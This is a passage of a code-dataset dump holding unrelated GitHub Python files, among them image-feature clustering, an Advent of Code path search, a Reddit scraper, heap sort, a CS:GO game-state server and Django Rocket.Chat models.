numpy as np\nimport constants\nimport random\nimport time\nimport cv2\n\nclass sift:\n \n siftSize=50 # no of clusters\n siftLimit=2000 \n surfLimit=1000 # no of interest points in each image\n # we will need to classify siftSize * no of images\n vetorSize=128\n epochs=100 # 200\n radiousS=siftSize\n radiousE=0 \n learningRateS=0.9\n learningRateE=0.015\n s=5 # Stepness factor.\n manager=Manager()\n processesNo=5;\n \n \n def getFeatureVector(classifiedSift,imageSift,training=True,image=None):\n if training==False:\n imageSift=sift.extractTheSift(image)\n featureVector=sift.matchTheSiftToCalcPDF(classifiedSift,imageSift)\n return featureVector\n \n def getFeatureVectorProcess(featureVectors,classifiedSift,imageSift,index):\n featureVectors[index]=sift.matchTheSiftToCalcPDF(classifiedSift,imageSift)\n \n \n def matchTheSiftToCalcPDF(classifiedSift,allSift):\n if len(allSift) == 0:\n return []\n imagePDF=[0 for i in range(sift.siftSize)] \n for i in range(len(allSift)):\n siftMinIndex=sift.getTheIndexOfMinVectorDiff(classifiedSift,allSift[i])\n imagePDF[siftMinIndex]+=(1/len(allSift)) # TODO: Be sure from the devision.\n return imagePDF\n \n \n def extractTheSift(image):\n imageSift=[] \n if constants.siftOrserf==\"sift\":\n siift = cv2.xfeatures2d.SIFT_create(sift.siftLimit)\n (kps,imageSift) = siift.detectAndCompute(image, None)\n imageSift/=255\n print(\"# kps: {}, descriptors: {}\".format(len(kps), imageSift.shape))\n else:\n surf = cv2.xfeatures2d.SURF_create(sift.surfLimit)\n kps,imageSift = surf.detectAndCompute(image,None)\n return imageSift\n \n \n def extractTheSiftAllImages(trainingDataImages):\n allSift=[]\n imagesSift=[[] for i in range(len(trainingDataImages))]\n for i in range(len(trainingDataImages)):\n imagesSift[i]=sift.extractTheSift(trainingDataImages[i])\n if i==0:\n allSift=imagesSift[i]\n else:\n allSift=np.vstack(( allSift,imagesSift[i]))\n return allSift,imagesSift\n \n def classifyTheSiftUsingKmean(trainingDataImages):\n start=time.time()\n allSift,imagesSift=sift.extractTheSiftAllImages(trainingDataImages)\n print(\"len of allSift \"+str(len(allSift))+\" time \"+str(time.time()-start))\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n ret,label,center=cv2.kmeans(allSift,sift.siftSize,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n classifiedSift= center\n return 
classifiedSift,imagesSift\n \n def classifyTheSiftUsingKohenenMap(trainingDataImages):\n start=time.time()\n allSift,imagesSift=sift.extractTheSiftAllImages(trainingDataImages)\n print(\"len of allSift \"+str(len(allSift))+\" time \"+str(time.time()-start))\n # Run the kohenen self organizing map algorithm.\n classifiedSift=[]\n if constants.siftOrserf==\"sift\":\n classifiedSift=[[random.uniform(0, 1) for j in range(sift.vetorSize)] for i in range(sift.siftSize)]\n else:\n classifiedSift=[[random.uniform(-1, 1) for j in range(sift.vetorSize)] for i in range(sift.siftSize)]\n radious=sift.radiousS\n rate=sift.learningRateS\n for k in range(sift.epochs):\n alpha=[False for i in range(sift.siftSize)]\n randomIndexArr = np.random.choice(len(allSift), 1,replace=False)\n randomIndex=randomIndexArr[0]\n randomInput=allSift[randomIndex]\n nearestContorIndex=sift.getTheIndexOfMinVectorDiff(classifiedSift,randomInput)\n sift.updateAlpha(alpha,radious,nearestContorIndex)\n sift.updateWeights(classifiedSift,alpha,rate,randomInput)\n radious,rate=sift.updateTrainingParamters(k+1)\n return classifiedSift,imagesSift\n \n \n \n def updateAlpha(alpha,radious,index):\n minRange=max(index-round(radious),0)\n maxRange=min(index+round(radious),len(alpha))\n for i in range(minRange,maxRange,1):\n alpha[i]=True\n \n def updateTrainingParamters(k):\n newRadious=pow((pow(sift.radiousE,(1/sift.s))-pow(sift.radiousS,(1/sift.s)))*(k/sift.epochs)+pow(sift.radiousS,(1/sift.s)),sift.s)\n newRate=pow((pow(sift.learningRateE,(1/sift.s))-pow(sift.learningRateS,(1/sift.s)))*(k/sift.epochs)+pow(sift.learningRateS,(1/sift.s)),sift.s)\n return newRadious,newRate\n \n def updateWeights(classifiedSift,alpha,rate,randomInput):\n for i in range(sift.siftSize):\n difference=[np.subtract(randomInput[j],classifiedSift[i][j]) for j in range(len(randomInput))]\n classifiedSift[i]=[np.add(classifiedSift[i][j],rate*alpha[i]*difference[j]) for j in range(len(difference))]\n \n def getFeatureVectors(trainingDataImages):\n start = time.time()\n classifiedSift=[]\n imagesSift=[]\n if constants.clusteringMethod==\"kohenent\": \n classifiedSift,imagesSift=sift.classifyTheSiftUsingKohenenMap(trainingDataImages)\n else:\n classifiedSift,imagesSift=sift.classifyTheSiftUsingKmean(trainingDataImages)\n print(\"Time taken to excute the kohenent = \"+str(time.time() - start))\n # Initialize the vectors of each image with empty vector.\n start2 = time.time() \n featureVectors=sift.manager.list([[] for i in range(len(trainingDataImages))])\n processes = [sift.createProcess(classifiedSift,imagesSift[i],i,featureVectors) for i in range(len(trainingDataImages))]\n for p in processes:\n p[0].start()\n for p in processes:\n p[0].join()\n print(\"thread index = \"+str(p[1]),str(len(featureVectors[p[1]])))\n p[0].terminate()\n featureVectorsTemp=featureVectors\n del featureVectors\n print(\"Time taken to excute the featureVectors loop = \"+str(time.time() - start2))\n return classifiedSift,featureVectorsTemp\n \n def createProcess(classifiedSift,imageSift,index,featureVectors):\n process = Process(target=sift.getFeatureVectorProcess, args=(featureVectors,classifiedSift,imageSift,index))\n return (process ,index)\n \n\n\n def getTheIndexOfMinVectorDiff(allVectors,vector):\n minIndex=-1\n minDist=10000000\n for i in range(len(allVectors)):\n totalDist=sum([abs(allVectors[i][j]-vector[j]) for j in range(len(vector))])\n if totalDist 9\n exp_risk[to_wrap] = (exp_risk[to_wrap] % 10) + 1\n\n return exp_risk\n\n\ndef neighbors(index, max_i):\n row, column = index\n 
pot_n = [(row, column + 1),\n (row, column - 1),\n (row + 1, column),\n (row - 1, column)]\n return [i for i in pot_n if max(i) < max_i and min(i) >= 0]\n\n\ndef lowest_risk_dijkstra(f, n_expand=1, use_heuristics=False):\n risk = read_map(f)\n if n_expand > 1:\n risk = expand(risk, n_expand)\n\n max_i = risk.shape[0]\n a = np.arange(max_i)\n b = np.zeros_like(risk)\n for i in range(max_i):\n b[i] = a + i\n b[i, 0] = i\n heuristic_distance = np.flip(b)\n\n distance = np.full_like(risk, np.inf)\n distance[0, 0] = 0\n\n # mark initial node as current\n current = (0, 0)\n open_set = [current]\n\n while True:\n # loop through unvisited neighbors\n for n in neighbors(current, max_i=max_i):\n # set new distance value if lower than previous\n new_distance = distance[current] + risk[n]\n if new_distance < distance[n]:\n distance[n] = new_distance\n if n not in open_set:\n open_set.append(n)\n\n # set current node to visited\n open_set.remove(current)\n if not open_set:\n break\n\n # choose new current node according to distance\n if use_heuristics:\n distances_open_set = [distance[i] + heuristic_distance[i] for i in open_set]\n else:\n distances_open_set = [distance[i] for i in open_set]\n\n current = open_set[np.argmin(distances_open_set)]\n print(current)\n\n return distance[-1, -1]\n\n\nif __name__ == '__main__':\n # lowest = lowest_risk_dijkstra('input.txt', use_heuristics=True)\n lowest_exp = lowest_risk_dijkstra('input.txt', n_expand=5, use_heuristics=False)\n\n # print(f'Lowest total risk: {lowest}')\n print(f'Lowest total risk after expansion: {lowest_exp}')\n","repo_name":"qku/advent-of-code","sub_path":"src/advent_of_code/2021/15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70147956414","text":"import json\nimport requests\nimport datetime as dt\nimport re\nimport csv\n\nMONTHS = range(1, 13)\nYEARS = range(2014,2022)\nSUBREDDIT = \"showerthoughts\"\nENDPOINT=\"https://api.pushshift.io/reddit/search/submission/\"\n\ntimestamps=[]\n\nfor year in YEARS:\n for month in MONTHS:\n after_timestamp = dt.datetime(year, month, 1).timestamp()\n\n if month==12:\n before_timestamp = dt.datetime(year+1, 1, 1).timestamp()\n else:\n before_timestamp = dt.datetime(year, month+1, 1).timestamp()\n\n timestamps.append((int(after_timestamp), int(before_timestamp)))\n\nshower_thoughts=[]\n\nfor after, before in timestamps:\n payload = {\n 'subreddit':SUBREDDIT, \n 'sort_type':'score',\n 'fields':('title', 'selftext'),\n 'after':after,\n 'before':before\n }\n response = requests.get(ENDPOINT, params=payload)\n print(f\"getting posts from {dt.datetime.fromtimestamp(after)} to {dt.datetime.fromtimestamp(before)}\")\n for post in response.json()['data']:\n try:\n title=post['title']\n text=post['selftext']\n except: continue\n shower_thought=re.sub(\"\\[.*?\\]\",'',f\"{title} {text}\")\n shower_thoughts.append([shower_thought])\n\nwith open('showerthoughts.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"showerthoughts\"])\n writer.writerows(shower_thoughts)\n\nprint(\"All Done!\")","repo_name":"daspartho/shower-thought","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12303537549","text":"from .. 
import graph, using, style\nfrom flask_babel import gettext as _l\nimport pygal\n\n\n@graph(_l('Browser'))\n@using('account_activity')\ndef device_usage(data):\n acc_act = data['account_activity']\n browser = acc_act.browser.value_counts()\n browser = browser / browser.sum() * 100\n browser = browser.round(2)\n\n pie_chart = pygal.Pie(style=style, inner_radius=.4)\n for os, count in zip(browser.index, browser):\n pie_chart.add(os, count)\n\n return pie_chart\n\n return chart\n","repo_name":"klima7/Social-Insight","sub_path":"analytics/administration/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18226129463","text":"import sys\nsys.stdin = open(\"input.txt\",\"r\")\n\nTC=int(input())\nfor num in range(1,TC+1):\n n=int(input())\n mp=[list(input().split()) for _ in range(n)]\n print(f'#{num}')\n for i in range(n):\n oneline1=\"\"\n oneline2=\"\"\n oneline3=\"\"\n for j in range(n):\n oneline1+=mp[n-1-j][i] # 90도 회전\n oneline2+=mp[n-1-i][n-1-j] # 180도 회전\n oneline3+=mp[j][n-1-i] # 270도 회전\n print(f'{oneline1} {oneline2} {oneline3}')","repo_name":"HorangApple/TIL","sub_path":"Algorithm/SWEA/13일차/190227 - 숫자 배열 회전.py","file_name":"190227 - 숫자 배열 회전.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21127407359","text":"from . import default\n\n\n\"\"\"Valgrind flavor, used for running code through Valgrind.\"\"\"\n\n\nclass ValgrindFlavor(default.DefaultFlavor):\n def __init__(self, m, app_name):\n super(ValgrindFlavor, self).__init__(m, app_name)\n self._suppressions_file = self.m.path['start_dir'].join(\n 'skia', 'tools', 'valgrind.supp')\n self._valgrind_cipd_dir = self.m.vars.workdir.join('valgrind')\n self._valgrind_fake_dir = self._valgrind_cipd_dir\n self._valgrind = self._valgrind_fake_dir.join('bin', 'valgrind')\n self._lib_dir = self._valgrind_fake_dir.join('lib', 'valgrind')\n\n def step(self, name, cmd, **kwargs):\n new_cmd = [self._valgrind, '--gen-suppressions=all', '--leak-check=full',\n '--track-origins=yes', '--error-exitcode=1', '--num-callers=40',\n '--suppressions=%s' % self._suppressions_file]\n path_to_app = self.host_dirs.bin_dir.join(cmd[0])\n new_cmd.append(path_to_app)\n new_cmd.extend(cmd[1:])\n with self.m.env({'VALGRIND_LIB': self._lib_dir}):\n return self.m.run(self.m.step, name, cmd=new_cmd, **kwargs)\n","repo_name":"google/skia","sub_path":"infra/bots/recipe_modules/flavor/valgrind.py","file_name":"valgrind.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":8112,"dataset":"github-code","pt":"81"} +{"seq_id":"12951569304","text":"import sys\nfrom string import Template\n\n\nDEFAULT_TOKEN_ID_HEX = \"487291c237b68dd2ab213be6b5d1174666074a5afab772b600ea14e8285affab\"\n\n\nCONTRACT = Template(\"\"\"\n contract (state: State, tx: Transaction, secret: Array[Byte]) = {\n let secretHash = hex\"$secret_hash_hex\"\n let participantAddress = base58\"$participant_address\"\n let tokenId = hex\"$token_id_hex\"\n let amount = $amount\n let redemptionDeadline = $redemption_deadline // Timestamp\n sha256(secret) == secretHash && tx.outputs.exists(lamb (bx: Box) = if (let assetBx: AssetBox = bx) {\n assetBx.tokenId == tokenId &&\n assetBx.contractHash == participantAddress &&\n assetBx.amount >= amount\n } else false) || (sha256(secret) == secretHash && state.lastBlockTimestamp > 
redemptionDeadline)\n }\n \"\"\")\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if (len(args) >= 4):\n secret_hash_hex = args[0]\n participant_address_hex = args[1]\n amount = args[2]\n redemption_deadline = args[3]\n \n try:\n token_id_hex = args[4]\n except IndexError:\n token_id_hex = DEFAULT_TOKEN_ID_HEX\n \n print(CONTRACT.substitute({\n \"secret_hash_hex\" : secret_hash_hex,\n \"participant_address\" : participant_address,\n \"amount\" : amount,\n \"redemption_deadline\" : redemption_deadline,\n \"token_id_hex\" : token_id_hex\n }))\n else:\n print(\"Usage: atomic_swap_contract.py [OPTIONAL]\")\n sys.exit()\n\n\n","repo_name":"EncryFoundation/EncryUseCases","sub_path":"atomic_swap/utils/atomic_swap_contract.py","file_name":"atomic_swap_contract.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42607280797","text":"# coding=utf-8\n\nfrom scapy.all import send\n\n\nclass EasyPacket(object):\n def __init__(self, packet, protocol, dst_mac, src_mac, dst_ip, src_ip, dport=None, sport=None):\n self.packet = packet\n self.protocol = protocol\n\n self.dst_mac = dst_mac\n self.src_mac = src_mac\n\n self.dst_ip = dst_ip\n self.src_ip = src_ip\n\n self.dport = dport\n self.sport = sport\n\n def _send_packet(self):\n send(self.packet)\n\n\n\n","repo_name":"xrtdkr/tcpProj","sub_path":"eazy_packet.py","file_name":"eazy_packet.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39717720364","text":"def heap_sort(lst):\n def sift_down(start, end):\n \"\"\"最大堆调整\"\"\"\n root = start\n while True:\n child = 2 * root + 1\n if child > end: # 没有孩子\n break\n if child + 1 <= end and lst[child] < lst[child + 1]: # 左孩子小于右孩子\n child += 1\n if lst[root] < lst[child]: # 根小于孩子,那么交换并继续向下\n lst[root], lst[child] = lst[child], lst[root]\n root = child\n else:\n break\n\n # 从倒数第一层向上,查看是否满足最大堆性质,来创建最大堆\n for start in range((len(lst) - 2) // 2, -1, -1):\n sift_down(start, len(lst) - 1)\n\n # 每次交换最大和队尾元素,并维持堆进行堆排序\n for end in range(len(lst) - 1, 0, -1):\n lst[0], lst[end] = lst[end], lst[0]\n sift_down(0, end - 1)\n return lst\n\n\nif __name__ == \"__main__\":\n l = [9, 2, 1, 7, 6, 8, 5, 3, 4]\n print(heap_sort(l))\n\n","repo_name":"shiyutang/DL-Prep","sub_path":"04_Algorithms/Leetcode/heap sort.py","file_name":"heap sort.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"71293039625","text":"res = 0;\nfor x in range(0, 1000):\n if x%3 ==0 or x%5==0:\n res += x\nprint(res, x)\n\n\n\n\n\"\"\" the following code is for ugly number problem\nres = []\ni3=0\ni5=0\nres.append(1)\nnext3=res[i3]*3\nnext5=res[i5]*5\nwhile res[-1] < 10:\n tmp = min(next3, next5)\n if tmp>10:\n break\n res.append(tmp)\n if tmp == next3:\n i3+=1\n next3 = res[i3]*3\n else:\n i5+=1\n next5 = res[i5]*5\nsumres=0;\nfor x in res:\n sumres += x;\nprint (res);\n\"\"\"\n","repo_name":"haojian/Euler","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8373447629","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nfrom operator import attrgetter\nfrom threading import Thread\nimport json\n\nimport gamestate\nimport payloadparser\n\nclass GSIServer(HTTPServer):\n def __init__(self, 
server_address, auth_token):\n super(GSIServer, self).__init__(server_address, RequestHandler)\n\n self.auth_token = auth_token\n self.gamestate = gamestate.GameState()\n self.parser = payloadparser.PayloadParser()\n \n self.running = False\n\n def start_server(self):\n try:\n thread = Thread(target=self.serve_forever)\n thread.start()\n first_time = True\n while self.running == False:\n if first_time == True:\n print(\"CS:GO GSI Server starting..\")\n first_time = False\n except:\n print(\"Could not start server.\")\n\n def get_info(self, target, *argv):\n try:\n if len(argv) == 0:\n state = attrgetter(f\"{target}\")(self.gamestate)\n elif len(argv) == 1:\n state = attrgetter(f\"{target}.{argv[0]}\")(self.gamestate)\n elif len(argv) == 2:\n state = attrgetter(f\"{target}.{argv[0]}\")(self.gamestate)[f\"{argv[1]}\"]\n else:\n print(\"Too many arguments.\")\n return False\n if \"object\" in str(state):\n return vars(state)\n else:\n return state\n except Exception as E:\n print(E)\n return False\n\nclass RequestHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n length = int(self.headers[\"Content-Length\"])\n body = self.rfile.read(length).decode(\"utf-8\")\n\n payload = json.loads(body)\n\n if not self.authenticate_payload(payload):\n print(\"auth_token does not match.\")\n return False\n else:\n self.server.running = True\n\n self.server.parser.parse_payload(payload, self.server.gamestate)\n\n def authenticate_payload(self, payload):\n if \"auth\" in payload and \"token\" in payload[\"auth\"]:\n return payload[\"auth\"][\"token\"] == self.server.auth_token\n else:\n return False\n","repo_name":"Erlendeikeland/csgo-gsi-python","sub_path":"csgo-gsi-python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"81"} +{"seq_id":"39017916869","text":"\"\"\"\nStatus -> Solved by myself\n\nTime complexity -> O(N + M)\nSpace complexity -> O(log N)\n\nSolution\n1. nums to list onvertor\n convert number to list of digits \n create nodes from each digit\n2. List to num convertor\n loop through nodes\n on each iteration add number to counter multipled by 10 powered to iteration step\n3. 
convert lists to nums, add, convert back to list\n\"\"\"\nfrom typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \n def __repr__(self) -> str:\n return f'ListNode(v={self.val}, next={self.next})'\n\n\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n return build_list(from_list_to_num(l1) + from_list_to_num(l2))\n\ndef from_list_to_num(node):\n counter = 0\n multiplier = 1\n while node is not None:\n counter += node.val * multiplier\n multiplier *= 10\n node = node.next\n\n return counter\n\ndef build_list(num):\n num_list = [int(i) for i in str(num)]\n previous_node = None\n for i in num_list:\n node = ListNode(i, previous_node)\n previous_node = node\n\n return previous_node\n\n\nclass Solution2:\n # Time complexity O(N + M)\n # Space complexity O(1)\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n extra = 0\n l1_node = l1\n l2_node = l2\n while l1_node or extra:\n l1_val = l1_node.val if l1_node else 0\n l2_val = l2_node.val if l2_node else 0\n if l1_node:\n l1_node.val = (l1_val + l2_val + extra) % 10\n else:\n l1_node = ListNode((l1_val + l2_val + extra) % 10)\n last_node.next = l1_node\n extra = (l1_val + l2_val + extra) // 10\n\n if l2_node and l1_node.next is None and l2_node.next is not None:\n l1_node.next = l2_node.next\n l2_node.next = None\n\n if l1_node.next is None:\n last_node = l1_node\n l1_node = l1_node.next if l1_node else None\n l2_node = l2_node.next if l2_node else None\n return l1\n\n\nif __name__ == '__main__':\n first = build_list(0)\n second = build_list(37)\n sol = Solution2()\n res = sol.addTwoNumbers(first, second)\n res2 = from_list_to_num(res)\n print(f'Result --> {res2}')\n print(f'Result --> {res}')","repo_name":"mykhailov-my/leetcode","sub_path":"2_add_two_numbers.py","file_name":"2_add_two_numbers.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15029874237","text":"\"\"\"\n# Taking input\nmajor = input(\"Enter your Major: \")\nno_of_credits = int(input(\"Enter the number of credits you are enrolled in: \"))\nyear, gpa = input(\"Enter your Year, GPA: \").split(',')\ngpa = float(gpa)\nprint('You are enrolled in ' + year + ' year in ' + major +\n ' Major. 
You have currently taken', no_of_credits,\n 'credits and your GPA is ' + str(gpa))\n\"\"\"\n\n# simple if statement\ntest = 67 < 78\nif test:\n print('logical value of test is True')\n\n# simple if-else statement\ncondition = 24 == 56\nif condition:\n print('Condition is True')\nelse:\n print('Condition is False')\n\n# if-elif statements\nnumber = 12\nif (number >= 0) and (number < 10):\n print('Number is in the range 0 to 9')\nelif (number >= 10) and (number < 20):\n print('Number is in the range 10 to 19')\nelif (number >= 20) and (number < 30):\n print('Number is in the range 20 to 29')\nelse:\n print('Number is negative or greater than 29')\n\n\n# for loop\nfor i in range(5):\n print('hello world')\n\n# while loop\ncount = 0\nwhile count < 5:\n print('hello world')\n count += 1\n\n# Break Statement\nfor i in range(5, 10):\n print(i)\n if i == 8:\n break\n\n# Continue Statement\nfor i in range(5, 10):\n if i == 7 or i == 8:\n continue\n print(i)\n\n\n","repo_name":"Ebad8931/PythonWorkshop","sub_path":"02_control_structures.py","file_name":"02_control_structures.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30204166841","text":"con = 0\nne = 0\nwhile con < 5:\n con = con+1\n num = int(input(\"Digite um numéro:\"))\n\n if(num < 0):\n ne = ne+1\n\nprint(\"Total de numéros negativos digitado: %d\" %ne)","repo_name":"work-vitor/Logica-de-Program-o---Python","sub_path":"Lista 3/ex9.py","file_name":"ex9.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25869326079","text":"from django.db import models\nfrom django.dispatch import receiver\nfrom django.utils.crypto import get_random_string\nfrom django.db.models.signals import post_delete, post_save, m2m_changed, pre_delete\nfrom django.conf import settings\n\nfrom accounts.models import User, UserProfile\nfrom projects.models import Task\n\nfrom .helpers import RocketChat\nfrom django.contrib.postgres.fields import JSONField\nfrom django.contrib.postgres.fields.jsonb import KeyTextTransform\nimport sys\nfrom rest_framework import serializers\n\nMESSAGE_TYPE = [('opinion','opinion'),\n ('decisions','decisions'),\n ('argument','argument'),\n ('task','task'),\n ('gut_feeling','gut_feeling'),\n ('decision_poll','decision_poll'),\n ('assumption','assumption'),\n ('suggestion','suggestion'),\n ('thought_experiment','thought_experiment'),\n ('hypothesis','hypothesis')]\n\n\nclass UserChat(models.Model):\n \"\"\"\n Model for chat user data\n \"\"\"\n user = models.OneToOneField(User, related_name='chat')\n username = models.CharField(max_length=32)\n raw_password = models.CharField(max_length=16)\n auth_token = models.CharField(max_length=50, blank=True)\n chat_user_id = models.CharField(max_length=20, blank=True)\n\n\nclass TaskGroup(models.Model):\n \"\"\"\n Model for chat groups data\n \"\"\"\n task = models.OneToOneField(Task)\n group_id = models.CharField(max_length=20)\n title = models.CharField(max_length=100)\n\n\ndef get_chat_user(\n user: User, commit: bool = True, rocket_admin: RocketChat = None\n) -> UserChat:\n \"\"\"\n Function get or create chat user\n \"\"\"\n if user.__str__():\n chat_user, created = UserChat.objects.get_or_create(\n user=user, defaults={\n 'username': user.username,\n 'raw_password': get_random_string(length=16)\n }\n )\n\n if rocket_admin is None:\n rocket_admin = RocketChat(\n settings.ROCKETCHAT_USER,\n 
settings.ROCKETCHAT_PASSWORD\n )\n\n if chat_user.chat_user_id:\n if not rocket_admin.users_info(chat_user.chat_user_id).json()['success']:\n created = True\n\n if created:\n rocket_user = rocket_admin.users_create(\n email= user.__str__(),\n name=user.first_name,\n password=chat_user.raw_password,\n username=chat_user.username\n )\n chat_user.chat_user_id = rocket_user.json()['user']['_id']\n if commit:\n chat_user.save(update_fields=['chat_user_id'])\n return chat_user\n else:\n raise serializers.ValidationError({\"email\":'Email is Required.'})\n\n\n\n\nclass MessageType(models.Model):\n \"\"\"\n Model for different type of messages for particular chat groups\n \"\"\"\n group_id = models.CharField(max_length=100, blank=True, null=True)\n message_id = models.CharField(max_length=50, blank=True, null=True)\n message_type = models.CharField(choices=MESSAGE_TYPE, max_length=30, blank=True, null=True)\n options = JSONField(blank=True, null=True)\n # options = models.CharField(blank=True, null=True)\n voting = JSONField(blank=True, null=True)\n chat_user_id = models.CharField(max_length=50, blank=True, null=True)\n parent_message_id = models.CharField(max_length=50, blank=True, null=True)\n\n\nclass DecisionPollVote(models.Model):\n \"\"\"\n Model for Decision Poll Voting\n \"\"\"\n message_id = models.CharField(max_length=50, blank=True, null=True)\n options = models.IntegerField(blank=True, null=True)\n chat_user_id = models.CharField(max_length=50, blank=True, null=True)\n\n@receiver(post_save, sender=DecisionPollVote)\ndef calculate_vote(sender, instance, created, **kwargs):\n # if created:\n voters = 0\n message_type_id = MessageType.objects.filter(message_id=instance.message_id).first()\n if message_type_id:\n group_obj = TaskGroup.objects.filter(group_id=message_type_id.group_id).first()\n task_obj = Task.objects.filter(id=group_obj.task.id).first()\n participants = task_obj.participants.all()\n\n if not message_type_id.voting:\n voting = []\n for i in message_type_id.options:\n voting.append({\"id\":i[\"id\"],\"option\":i[\"option\"],\"votes\":0,\"percentage\":0.0})\n message_type_id.voting = voting\n message_type_id.save()\n for i in message_type_id.voting:\n if i[\"id\"] == instance.options:\n i[\"votes\"] += 1\n if len(participants) > 0:\n i[\"percentage\"] = (i[\"votes\"]/len(participants))*100\n message_type_id.save() \n\n@receiver(post_save, sender=Task)\ndef calculate_vote_task(sender, instance, created, **kwargs):\n if not created:\n participants = instance.participants.all()\n group_obj = TaskGroup.objects.filter(task=instance).first()\n if group_obj:\n message_type_obj = MessageType.objects.filter(group_id=group_obj.group_id).first()\n if message_type_obj:\n if not message_type_obj.voting:\n voting = []\n if message_type_obj.options:\n for i in message_type_obj.options:\n voting.append({\"id\":i[\"id\"],\"option\":i[\"option\"],\"votes\":0,\"percentage\":0.0})\n message_type_obj.voting = voting\n message_type_obj.save()\n if message_type_obj.voting:\n for i in message_type_obj.voting:\n if len(participants) > 0:\n i[\"percentage\"] = (i[\"votes\"]/len(participants))*100\n message_type_obj.save()\n\n\n# We need exclude chat signals from tests\nif 'test' not in sys.argv:\n\n @receiver(post_delete, sender=User)\n def handler_delete_user(sender, instance, **kwargs):\n \"\"\"\n Signal delete user from chat\n \"\"\"\n rocket_admin = RocketChat(\n settings.ROCKETCHAT_USER,\n settings.ROCKETCHAT_PASSWORD\n )\n rocket_admin.users_delete(instance.chat.chat_user_id)\n\n\n 
@receiver(post_save, sender=User)\n @receiver(post_save, sender=UserProfile)\n def handler_user_update_data(sender, instance, **kwargs):\n \"\"\"\n Signal update user data when user update his profile\n \"\"\"\n if sender == User:\n user = instance\n else:\n user = instance.user\n\n try:\n chat_user = UserChat.objects.get(user=user)\n if chat_user.username != user.username:\n chat_user.username = user.username\n chat_user.save(update_fields=['username'])\n except UserChat.DoesNotExist:\n pass\n\n\n @receiver(pre_delete, sender=Task)\n def handler_task_delete_channel(sender, instance, **kwargs):\n \"\"\"\n Signal delete chat group and task group data\n \"\"\"\n rocket_admin = RocketChat(\n settings.ROCKETCHAT_USER,\n settings.ROCKETCHAT_PASSWORD\n )\n\n for participant in instance.participants.all():\n chat_user = get_chat_user(participant, rocket_admin=rocket_admin)\n rocket = RocketChat(\n headers={\n 'X-Auth-Token': chat_user.auth_token,\n 'X-User-Id': chat_user.chat_user_id\n }\n )\n try:\n task_group = TaskGroup.objects.get(task=instance)\n rocket.groups_close(task_group.group_id)\n message_type_ids = MessageType.objects.filter(group_id=task_group.group_id).values_list('message_id',flat=True)\n decision_poll_obj = DecisionPollVote.objects.filter(message_id__in=message_type_ids)\n decision_poll_obj.delete()\n message_type_obj = MessageType.objects.filter(group_id=task_group.group_id)\n message_type_obj.delete()\n task_group.delete()\n except TaskGroup.DoesNotExist:\n pass\n\nclass DirectGroup(models.Model):\n \"\"\"\n Model for Direct Group data\n \"\"\"\n group_id = models.CharField(max_length=100)\n participant1 = models.CharField(max_length=100)\n participant2 = models.CharField(max_length=100)\n\n\n# @receiver(m2m_changed, sender=Task.participants.through)\n# def handler_change_task_participants(sender, instance, action, **kwargs):\n# \"\"\"\n# Signal update chat group participants\n# \"\"\"\n# if action in ['post_add', 'post_remove']:\n# rocket_admin = RocketChat(\n# settings.ROCKETCHAT_USER,\n# settings.ROCKETCHAT_PASSWORD\n# )\n\n# for user in User.objects.filter(pk__in=list(kwargs['pk_set'])):\n# chat_user = get_chat_user(user, rocket_admin=rocket_admin)\n\n# try:\n# group = TaskGroup.objects.get(task=instance)\n# except TaskGroup.DoesNotExist:\n# return\n\n# if action == 'post_add':\n# rocket_admin.groups_invite(\n# group.group_id, chat_user.chat_user_id\n# )\n\n# if action == 'post_remove':\n# rocket_admin.groups_kick(\n# group.group_id, chat_user.chat_user_id\n# )\n","repo_name":"superdev317/management_plan_backend","sub_path":"chat/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29102488018","text":"# encoding: utf-8\n\nfrom requests_toolbelt import MultipartEncoder\nimport requests\n\nhost='http://112.74.112.220:8083'#禅道服务器地址\n\ndef 